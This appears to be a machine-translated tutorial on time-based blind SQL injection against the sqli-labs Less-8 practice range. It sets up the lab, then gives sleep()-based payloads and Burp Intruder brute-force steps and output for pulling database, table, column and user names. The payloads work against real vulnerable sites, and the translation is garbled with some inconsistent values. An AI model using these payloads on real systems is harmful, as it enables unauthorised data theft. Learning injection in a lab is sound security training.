SQL Blind note ： Injection based on time delay

Shooting range environment construction

Software required

Phpstudy2016,sql Injection range file Phpstduy Official website download address ：https://www.xp.cn/ sql Injection range download address ：https://github.com/Audi-1/sqli-labs

Download and install phpstudy, download sql Inject the range file compressed package ,

Extract the file range environment file , Put it in phpstudy In the file directory WWW Under the folder ,

And then run phpstudy

And then visit ,http://localhost/, perhaps http://127.0.0.1

Click on Setup/reset Database for labs Option to install files such as range database

This indicates that the installation is complete

Return to visit http://127.0.0.1 Home page is OK

contrast ascii surface

This time sql The eighth level is selected for delayed injection （ The picture shows ）.

SQL Injection tools are basically blind injection and other injections . Here we use Mysql Blind note is an example ： What is delay injection ？

The so-called delay injection mainly aims at the page without change , Boolean true and false cannot be used to judge , Inject when an error cannot be reported .

You need to use Mysql Of 4 A function ：sleep()、if()、mid()、ord();

• sleep() // Time delay
• if( Conditions ,True,False) // Judgment statement
• mid(str,1,1) Intercept // Specify string interception , Intercept character start length - The end of the length of the
• ascii // Convert to ascii code

Guess the name of the library

Let's guess first database() Current database name ,

Construction statement

‘ and if(ascii(mid(database(),1,1)) =1,sleep(5),1) –+

The grammar means ,mid Function method intercept database() The first character of the current library name , Determine whether the first character is 1,

1. The corresponding is ascii character , If the first character = One of them ascii character , Then delay 5 second , If not, then delay 1 second , We can use a shortcut here , Go straight up burpsuite You can access this address by blasting , Then grab the bag

http://127.0.0.1/Less-8/?id=1’ and if(ascii(mid(database(),1,1)) =1,sleep(5),1) –+

Right key

choice Send to intrude Send it to the blasting guessing module

After sending , We choose the two parameters of blasting

Next, choose payload modular

The first parameter is the shortcut module Numbers

The second module is the same , But here is all ascii Decimal digits corresponding to characters

1-127

Click... On the right after filling in Start attack Button , Start blasting

Blast it out to get database() Library name , Corresponding ascii Let's splice the characters

1-115 ,2-101,3-99,4-117,5-114,6-105,7-116,8-121 Corresponding ascii Finally, the database name of the table is security

http://127.0.0.1/Less-8/?id=1’ and if(ascii(mid(database(),1,1)) =1,sleep(5),1) –+

Judge the length of the table name

Construction statement

’ and if(length(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=4,1,sleep(5)) –+

There is a delay , Note that the length of the table name is not equal to 4..

’ and if(length(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=6,1,sleep(5)) –+

There is a delay , The length of the table name is 6.

Guess the name of the watch

Construction statement

http://127.0.0.1/Less-8/index.php?id=1' and if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>113,sleep(10),1);–+

Description of compliance , first ascii Greater than 113

http://127.0.0.1/Less-8/index.php?id=1' and if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>115,sleep(10),1);–+

disqualification , first ascii No more than 115

http://127.0.0.1/Less-8/index.php?id=1' and if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114,sleep(10),1);–+

eligible , Explain the first ascii code =115

It's too much trouble to write like this , You have to guess one by one , Here we go straight to burpsuite Blasting guessing access poc Grab the bag

http://127.0.0.1/Less-8/index.php?id=1’and if(ascii(mid((select table_name frominformation_schema.tables where table_schema=database() limit1,1),1,1))=113,sleep(10),1);–+

Then guess the name of the table just like the name of the database

choose Choose this Two individual ginseng Count

Then import the dictionary and start blasting

Finally, the corresponding table name ascii code

1114,101,102,101,114,101,114,115

Finally, the table name is referers

If you feel troublesome, you can also guess three table names at the same time

117 97 103 101 110 116 115 uagents

And then corresponding to ascii Check the code table and you can get all the table names .

Guess the list

Only need to select In the sentence

table_name Change it to column_name as well as information_schemation.tables Change it to information_schemation.columns

That's all right. .

Let's guess the following name

Construction statement

http://127.0.0.1/Less-8/index.php?id=1'and if(ascii(mid((select column_name from information_ schema.columns where table_schema=database() limit 1,1),1,1))>113,sleep(10),1); –+

Guess the content of the field

Construction statement

‘ and if(ascii(mid((select username from security.users order by id limit

0,1),2,1))=117,sleep(10),1);–+

Go straight up burp Blast

At the same time, the corresponding ascii code .

Corresponding ascii Code get email_id

Blast users surface

The result of blasting

0 200 false false 926

25601 1 1 65 200 false false 926 1

38541 1 8 97 200 false false 926 1

40061 1 4 101 200 false false 926 1

40841 1 3 103 200 false false 926 1

41701 1 6 105 200 false false 926 1

42881 1 5 108 200 false false 926 1

43621 1 2 110 200 false false 926 1

43721 1 7 110 200 false false 926 1

20110 10 6 51 200 false false 926 1

38410 10 1 97 200 false false 926 1

39630 10 2 100 200 false false 926 1

41670 10 4 105 200 false false 926 1

43250 10 3 109 200 false false 926 1

43690 10 5 110 200 false false 926 1

38511 11 6 97 200 false false 926 1

38451 11 3 97 200 false false 926 1

39611 11 1 100 200 false false 926 1

41231 11 2 104 200 false false 926 1

20512 12 6 52 200 false false 926 1

39632 12 2 100 200 false false 926 1

41672 12 4 105 200 false false 926 1

43252 12 3 109 200 false false 926 1

43262 2 4 109 200 false false 926 1

Corresponding ascii Code can get specific content information .